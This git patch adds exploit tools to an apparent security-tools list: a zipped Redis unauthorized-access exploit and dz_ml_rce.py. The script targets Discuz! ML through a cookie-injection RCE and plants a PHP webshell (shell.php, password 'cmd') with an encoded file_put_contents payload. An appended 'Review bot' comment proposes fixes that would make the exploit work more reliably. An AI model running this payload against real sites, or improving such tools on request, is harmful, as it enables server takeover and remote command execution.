From fdd9fccfc4a987b89813c51798826a5bbfdd01bd Mon Sep 17 00:00:00 2001 From: Mrxn Date: Sat, 1 Aug 2020 14:36:47 +0800 Subject: [PATCH] =?UTF-8?q?add=20Redis=E6=9C=AA=E6=8E=88=E6=9D=83=E8=AE=BF?= =?UTF-8?q?=E9=97=AE=E6=BC=8F=E6=B4=9E=E5=88=A9=E7=94=A8=E5=B7=A5=E5=85=B7?= =?UTF-8?q?&Discuz!=20ml=20RCE=E6=BC=8F=E6=B4=9E=E5=88=A9=E7=94=A8?= =?UTF-8?q?=E5=B7=A5=E5=85=B7?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit
---
 README.md | 2 +
 tools/Redis_Exp-by_PANDA墨森.zip | Bin 0 -> 3864 bytes
 tools/dz_ml_rce.py | 70 +++++++++++++++++++++++++++++++
 3 files changed, 72 insertions(+)
 create mode 100644 tools/Redis_Exp-by_PANDA墨森.zip
 create mode 100644 tools/dz_ml_rce.py
diff --git a/README.md b/README.md
index 792d098..870ac96 100644
--- a/README.md
+++ b/README.md
@@ -440,6 +440,8 @@
 - [fofa2Xray-一款联合fofa与xray的自动化批量扫描工具,使用Golang编写,适用于windows与linux](https://github.com/piaolin/fofa2Xray)
 - [CasExp-Apereo CAS 反序列化利用工具](https://github.com/potats0/CasExp)
 - [C_Shot-shellcode远程加载器](https://github.com/anthemtotheego/C_Shot)|[相关文章](./books/C_shot–shellcode远程加载器.pdf)
+- [dz_ml_rce.py-Discuz! ml RCE漏洞利用工具](./tools/dz_ml_rce.py)
+- [Redis未授权访问漏洞利用工具](./tools/Redis_Exp-by_PANDA墨森.zip)
 ## 文章/书籍/教程相关
diff --git a/tools/Redis_Exp-by_PANDA墨森.zip b/tools/Redis_Exp-by_PANDA墨森.zip new file mode 100644 index 0000000000000000000000000000000000000000..42dcd1164b64162ac115fa4aae28782855d6ac8e GIT binary patch literal 3864 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 Gc=|s#B2vZx literal 0 HcmV?d00001 diff --git a/tools/dz_ml_rce.py b/tools/dz_ml_rce.py new file mode 100644 index 0000000..b6e1727 --- /dev/null +++ b/tools/dz_ml_rce.py 
@@ -0,0 +1,70 @@
+#!/usr/bin/python
+# coding=utf-8
+
+import requests
+import re
+from argparse import ArgumentParser
+
+
+class Dz_Ml_RCE:
+ def __init__(self):
+ self.headers = {
+ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36',
+ 'Cookie': 'qbn8_2132_saltkey=Gbu6t373; qbn8_2132_language={}; qbn8_2132_lastvisit=1595902511; qbn8_2132_sid=TemWvk; qbn8_2132_lastact=1595906207%09forum.php%09; qbn8_2132_sendmail=1; qbn8_2132_onlineusernum=1;PHPSESSID=8phdj361a5d498n03tnqd7c104;'
+ }
+
+ def check(self):
+ '''漏洞检测'''
+ self.headers['Cookie'] = self.headers['Cookie'].format("\'.phpinfo().\'")
+ r = requests.get(url=result.url, headers=self.headers)
+ if re.search(r'phpinfo\(\)', r.text):
+ print("[*]Target Is Seem To Be Vulnerable!")
+ else:
+ print("[!]Target Is Not Seem To Be Vulnerable!")
+
+ def getshell(self):
+ shell_payload = '%27.+file_put_contents%28%27shell.php%27%2Curldecode%28%27%25%33%63%25%33%66%25%37%30%25%36%38%25%37%30%25%32%30%25%36%35%25%37%36%25%36%31%25%36%63%25%32%38%25%32%34%25%35%66%25%35%30%25%34%66%25%35%33%25%35%34%25%35%62%25%32%32%25%36%33%25%36%64%25%36%34%25%32%32%25%35%64%25%32%39%25%33%62%25%33%66%25%33%65%27%29%29.%27'
+ self.headers['Cookie'] = self.headers['Cookie'].format(shell_payload)
+ r = requests.get(url=result.url, headers=self.headers)
+ if re.search(r'Forum - Powered by Discuz!', r.text):
+ print("[*]Shell Create Successfully!")
+ print(f"[+]shell:在 {result.url} 同目录下的shell.php 密码:cmd")
+ else:
+ print("[!]Shell Create Failed!")
+
+ def run(self):
+ if result.func == 'check':
+ self.check()
+ elif result.func == 'shell':
+ self.getshell()
+ else:
+ print("[!]请选择正确的功能:check(漏洞检测)/shell(直接getshell)!")
+
+
+def main():
+ if not result.func:
+ print("[!]请先使用-f指定可选的功能:check(漏洞检测)/getshell(直接getshell)")
+ return
+ else:
+ Dz_Ml_RCE().run()
+
+
+if __name__ == '__main__':
+ show = '''
+ _____ _ __ __ _ _____ _____ ______
+ | __ \ | | | \/ | | | __ \ 
/ ____| ____|
+ | | | |___| | | \ / | | | |__) | | | |__
+ | | | |_ / | | |\/| | | | _ /| | | __|
+ | |__| |/ /|_| | | | | |____ | | \ \| |____| |____
+ |_____//___(_) |_| |_|______| |_| \_\\_____|______|
+ ______
+ |______|
+
+ By PANDA墨森
+ '''
+ print(show + '\n'*2)
+ arg = ArgumentParser(description='Dz_Ml_RCE By PANDA墨森')
+ arg.add_argument('url', help='目标url,eag:http://www.xxx.com/discuz/upload/forum.php')
+ arg.add_argument('-f', '--func', help='可选的功能:check(漏洞检测)/shell(直接getshell)', dest='func', type=str)
+ result = arg.parse_args()
+ main()
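Review bot: The shebang `#!/usr/bin/python` at the top of the hunk does not match the f-string used in `print(f"[+]shell:在 {result.url} 同目录下的shell.php 密码:cmd")`, so wherever that path resolves to Python 2 the file fails at compile time with a SyntaxError before any argument parsing runs; `#!/usr/bin/env python3` would name the interpreter the code actually requires. The usage hint in `main()` tells the user to pass `getshell`, but `run()` and the `-f` argparse help accept only `shell`, so following the hint lands in the "请选择正确的功能" branch; the string should read `check(漏洞检测)/shell(直接getshell)` to match. Both `requests.get(url=result.url, headers=self.headers)` calls carry no `timeout=`, so an unresponsive host blocks the script indefinitely and a connection error surfaces as a raw traceback; a timeout plus an `except requests.RequestException` around each call would turn that into a clear message. `check()` and `getshell()` also read the module global `result`, which only exists under `if __name__ == '__main__'`, so importing the module for testing raises NameError on first use — worth a comment on the class if that coupling is intentional.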